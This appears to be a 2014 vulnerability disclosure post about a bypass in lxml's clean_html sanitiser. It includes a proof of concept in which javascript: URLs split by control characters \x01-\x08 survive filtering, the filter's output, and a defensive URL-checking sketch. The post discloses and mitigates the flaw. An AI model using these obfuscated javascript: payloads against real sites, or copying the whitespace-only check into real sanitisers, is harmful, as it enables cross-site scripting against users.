
lxml Filter Bypass

Posted on 16 April 2014

Hi all,

I've accidentally found a vulnerability in the clean_html function of the lxml Python library. A user can break the URL scheme with non-printable characters (\x01-\x08). It seems that all versions, including the latest 3.3.4, are vulnerable.

Here is a PoC.

from lxml.html.clean import clean_html

html = '''
<html>
<body>
<a href="javascript:alert(0)">aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

print(clean_html(html))

Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>

Only the plain javascript: link and the \x09 (tab) variant are emptied; the \x01-\x08 variants pass through the filter.

I've emailed the lxml guys. Hope they'll fix it soon.

----
ksimka (@m_ksimka)
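For anyone checking URLs by hand in the meantime, the idea behind the bypass can be sketched in a few lines of plain Python. This is only an illustration and makes some assumptions: that the browser ignores control characters inside the scheme (which is what the PoC relies on), and that a whitespace-only check behaves roughly like the filter does in the output above. The names is_script_url and naive_is_script_url and the list of schemes are made up for this example; they are not lxml's API and not its fix.

```python
import re

# Assumption for this sketch: treat every ASCII control character and
# whitespace character (\x00-\x20) plus DEL (\x7f) as ignorable in a URL.
_IGNORED = re.compile(r"[\x00-\x20\x7f]+")

# Hypothetical list of schemes to reject; not taken from lxml.
_BAD_SCHEMES = ("javascript:", "vbscript:")


def naive_is_script_url(url):
    """Whitespace-only check: strips \\s characters, so \\x01-\\x08 slip through."""
    collapsed = re.sub(r"\s+", "", url).lower()
    return collapsed.startswith("javascript:")


def is_script_url(url):
    """Stricter check: drop all control characters before looking at the scheme."""
    normalized = _IGNORED.sub("", url).lower()
    return normalized.startswith(_BAD_SCHEMES)


if __name__ == "__main__":
    for code in range(1, 10):
        url = "javas" + chr(code) + "cript:alert(1)"
        print(repr(url), naive_is_script_url(url), is_script_url(url))
```

With the whitespace-only check, only the tab variant is recognised as a script URL, which matches the PoC output; the stricter check flags all nine variants while leaving ordinary http links alone.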

 
